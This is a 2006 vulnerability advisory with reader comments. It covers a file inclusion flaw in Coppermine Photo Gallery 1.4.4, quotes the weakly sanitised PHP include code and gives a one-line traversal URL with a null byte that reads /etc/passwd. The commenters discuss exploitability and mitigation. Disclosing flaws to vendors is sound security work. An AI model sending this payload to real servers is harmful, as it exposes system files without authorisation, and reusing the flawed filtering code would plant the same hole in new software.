——————-Summary—————-
Software: CPG Coppermine Photo Gallery
Sowtware’s Web Site: http://coppermine.sourceforge.net/
Versions: 1.4.4.stable
Class: Remote
Status: Unpatched
Exploit: Available
Solution: Not Available
Discovered by: imei addmimistrator
Risk Level: High
—————–Description—————
There is a security flaw in Coppermine Photo Gallery, one of popular photo galleries in internet, that allows attacker perform a File inclusion attack.
bug is in a security flaw in plugin inclusion system.this system do not propely validate parameter $_GET['file'] and have a simple removing speacial char mechanism that is evasionable easy.
————–See Also——————
file:{index.php}39
$file = str_replace(’//’,”,str_replace(’..’,”,$_GET['file']));
$path = ‘./plugins/’.$file.’.php’;
// Don’t include the codebase and credits files
if ($file != ‘codebase’ && $file != ‘configuration’ && file_exists($path)) {
// Include the code from the plugin
include_once($path);
$file = true;
}
————–Exploit———————-
/cpg/index.php?file=.//././/././/././/././/././/././/././/././/./etc/passwd%00
————–Credit———————–
Discovered by: imei addmimistrator
addmimistrator(4}gmail(O}com
imei(4}Kapda(O}IR
www.myimei.com
myimei.com/security
i can’t exploit this vulnurable… i try 5 sites… add and remove in the path /././
don’t work (((
Left by nothing on April 17th, 2006
Copy fine the POC and read the style of bypass :p
Left by Psymera on April 17th, 2006
Friends; I have some report that if on a host, GPC (get post cookie) option (magic_quotes_gpc = off ) was ON (may be) null injection of exploit will falt and entered string will equal to .//././/./[&also]./etc/passwd\0.php
you’ll see that this way exploit will not work properly BC if(file_Exist) section never will true!
Anouther notic!
This site is not a source for distributing Exploits. but it is for anouncing vendors for bug and go advance to seqre softwares world.
So,asking some question as “How can I hack via this, and How that works, or I cant use it,Help me please” are not according to the goal fo site. Let’s help vendors not annoy them and theire users!
sincerely
imei addmimistrator
Left by imei on April 18th, 2006
http://www.securityfocus.com/bid/17570
Left by imei on April 18th, 2006
It seems like this doesnt effect coppermine galleries running on openBSD.. (or maybe because I use their default php.ini.. which is said to be safe?). Anyway, I can’t seem to exploit it on my server.. which is good.. but doing it on a linux server.. this does seem to work.
Not that you can actually do alot… but it’s something that the guys at coppermine are working on.. thankfully.
Left by Ryan on April 20th, 2006
yes.. it seems like setting magic_quotes_gpc = on will fix this.. be it temporarilly until coppermine release a fix.
Left by Ryan on April 20th, 2006
example
it is just an example! this bug works!
(example provided by:akram142{4]hotmail(o)com)
Left by imei on April 20th, 2006